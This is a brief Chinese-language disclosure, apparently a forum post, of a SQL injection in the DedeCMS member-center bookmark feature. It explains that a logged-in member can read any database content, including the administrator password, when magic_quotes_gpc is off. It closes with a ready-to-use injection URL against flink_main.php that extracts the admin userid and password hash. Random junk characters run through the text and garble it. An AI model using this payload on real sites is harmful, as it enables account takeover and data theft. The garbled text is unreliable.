DedeCMS会员中心SQL注射漏洞2 \2 ~5 ]5 U: X" m2 M- u) n8 i
需要magic_quotes_gpc = Off; R3 }) H4 k6 Q. \) L
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.3 g) x% ^5 K4 `& w, \9 D
. ^" S% T- p' _% [! y" F' Y: LDedeCMS会员中心书签管理SQL注射漏洞! k. f' G0 Z% I. w! F. }! K4 `
成功利用该漏洞可获得管理员密码% T g4 K$ Y; R2 ]! L( n/ ~' Y# S
9 }' s H8 B0 B) s1 ^1 T6 G- j会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
+ [3 Q' D3 e) k+ k9 H0 u* H
4 e7 O' w( F3 V& p% \2 Vhttp://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
1 Z+ u- ` [# A |